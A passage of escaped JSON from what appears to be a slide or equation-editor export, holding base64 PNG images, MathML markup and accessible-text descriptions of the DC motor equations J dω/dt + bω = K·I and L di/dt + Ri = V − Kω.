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\&quot;,\&quot;slideId\&quot;:301,\&quot;accessibleText\&quot;:\&quot;J fraction numerator d omega over denominator d t end fraction space plus space b omega space equals space K. I\&quot;,\&quot;imageHeight\&quot;:23.027027027027028},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;L&lt;/mi&gt;&lt;mfrac&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;/mrow&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;R&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mi&gt;V&lt;/mi&gt;&lt;mo&gt;-&lt;/mo&gt;&lt;mi&gt;K&lt;/mi&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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